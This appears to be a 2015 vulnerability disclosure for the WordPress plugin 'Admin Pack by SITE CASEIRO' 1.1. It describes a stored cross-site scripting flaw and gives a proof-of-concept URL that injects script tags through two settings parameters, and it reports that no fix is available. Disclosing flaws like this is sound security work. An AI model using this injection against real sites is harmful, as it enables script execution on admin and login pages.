Title: WordPress 'Admin Pack by SITE CASEIRO' Plugin Version: 1.1 Author: Morten N?rtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-14 Download: - https://wordpress.org/plugins/admin-pack-by-site-caseiro/ - https://plugins.svn.wordpress.org/admin-pack-by-site-caseiro/ Notified WordPress: 2015-06-21 ========================================================== ## Plugin description ========================================================== Insira uma imagem personalizada na pagina de login do WP, e configure o Rodap&eacute; da administra&ccedil;&atilde;o. ## Vulnerabilities ========================================================== Admin settings are stored and displayed unsanitized, making XSS possible. PoC: Log in as admin and visit this URL: [URL]/wp-admin/options-general.php?page=admin-pack-by-site-caseiro/admin-pack-sc.php&submit=adsf&sc_plugin_admin_personalizado_imagem=</style></textarea><script>alert(1)</script>&sc_plugin_admin_personalizado_rodape=</textarea><script>alert(2)</script> When the settings have been saved (by visiting the above URL), the first injected script ('sc_plugin_admin_personalizado_imagem' parameter) is also executed on the WordPress login page. ## Solution ========================================================== No fix available ========================================================== Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.